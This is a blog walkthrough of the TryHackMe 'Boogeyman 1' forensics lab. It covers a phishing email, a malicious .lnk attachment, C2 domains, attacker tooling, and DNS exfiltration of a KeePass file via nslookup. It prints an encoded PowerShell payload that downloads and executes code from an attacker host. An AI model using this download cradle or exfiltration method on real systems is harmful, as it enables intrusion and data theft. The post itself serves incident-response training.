attheoaks.com

Unveiling the Boogeyman: A Deep Dive into Threat Analysis

Written on

Chapter 1: Introduction to the Boogeyman Threat

A new threat actor has surfaced, adopting the moniker "Boogeyman." This persona raises concerns in the cybersecurity community. Are you prepared to face the Boogeyman?

In this section, we will explore the details of the incident.

Section 1.1: Key Information from the Attack

To begin our investigation, we must gather some crucial information. Here are the significant details regarding the phishing email involved:

  • Sender's Email Address: [email protected]
  • Victim's Email Address: [email protected]
  • Third-Party Mail Relay Service: The service used by the attacker, as inferred from the DKIM-Signature and List-Unsubscribe headers, is elasticemail.

Subsection 1.1.1: Analyzing the Encrypted Attachment

Investigating the Encrypted Attachment in Boogeyman Case

Within the encrypted attachment, we find a file named Invoice_20230103.lnk. To access its contents, you'll need the following password: Invoice2023!.

Section 1.2: Payload and Domain Analysis

Next, we need to investigate the encoded payload identified in the Command Line Arguments field using the lnkparse tool. The payload is:

aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZgBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==

For the attacker's file hosting and Command and Control (C2), the domains utilized are:

  • cdn.bpakcaging.xyz
  • files.bpakcaging.xyz

Chapter 2: Tools and Techniques Used by the Attacker

In our exploration, we note that the attacker downloaded an enumeration tool named seatbelt. Additionally, the attacker accessed a file using the sq3.exe binary located at:

C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

The software associated with this file is Microsoft Sticky Notes.

The second video expands upon the Boogeyman-1 TryHackMe Walkthrough, detailing further insights and methodologies.

Continuing our analysis, we find that the exfiltrated file is named protected_data.kdbx, which is associated with the keepass file type. The encoding method used during the exfiltration of sensitive data was hex, and the tool utilized for this exfiltration was nslookup.

As we delve deeper, we discover that the HTTP method employed by the C2 server for transmitting command outputs was POST and the exfiltration protocol used was DNS.

In summary, the password for the exfiltrated file can be decoded from the TCP stream, while the credit card number stored within it is identified through specific Wireshark queries.

That's all for now! Thank you for joining us in this detailed exploration. See you in the next room!

Share the page:

Twitter Facebook Reddit LinkIn

-----------------------

Recent Post:

# Embracing AI: Transformative Tools for Everyday Life

Explore how AI tools like Notion.ai, Midjourney, and AutoGPT can enhance productivity, creativity, and personal growth in daily life.

Strategies for Achieving Wealth Quickly: 7 Realistic Approaches

Explore seven practical strategies for building wealth quickly, while understanding the realistic aspects of achieving overnight success.

The SEO Benefits of a Hierarchical Site Structure Explained

Discover why a hierarchical site structure is essential for SEO success, as endorsed by Google, and its various advantages for website owners.

Unlocking Continuous Opportunities for Personal Growth

Explore how to continually create and seize opportunities for personal and professional growth.

Unlocking the Potential of AI: A Beginner's Guide to Monetization

Discover how to monetize AI with humor and ease. No tech degree required. Transform AI into your personal income generator today!

Harnessing Patience for Enhanced Productivity in Life

Discover how cultivating patience can enhance your productivity and personal growth through essential principles.

Optimizing Focus Modes for Enhanced Productivity on iOS

Discover how to customize Focus Modes on iOS for improved productivity and organization across various aspects of life.

Exploring Chamarel Waterfall and the Seven Coloured Earths

Discover the stunning Chamarel Waterfall and the unique Seven Coloured Earths in Mauritius, a must-visit during your stay.